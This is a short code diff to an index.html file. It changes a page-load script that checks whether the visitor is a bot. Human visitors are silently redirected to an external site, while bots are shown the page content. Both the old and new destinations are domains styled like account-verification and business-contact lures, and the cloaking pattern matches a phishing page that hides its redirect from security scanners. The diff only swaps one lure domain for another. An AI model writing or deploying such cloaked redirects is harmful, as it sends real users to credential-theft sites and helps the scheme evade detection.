--- a/index.html
+++ b/index.html
@@ -62,7 +62,7 @@
 
     window.onload = function() {
       if (!detectBot()) {
-        window.location.replace("https://start-unlocking-account-verification.netlify.app/")
+        window.location.replace("https://sp.aihefps-contact-bussines-2025.top/live")
       } else {
         document.getElementById('content').style.display = 'block'
       }
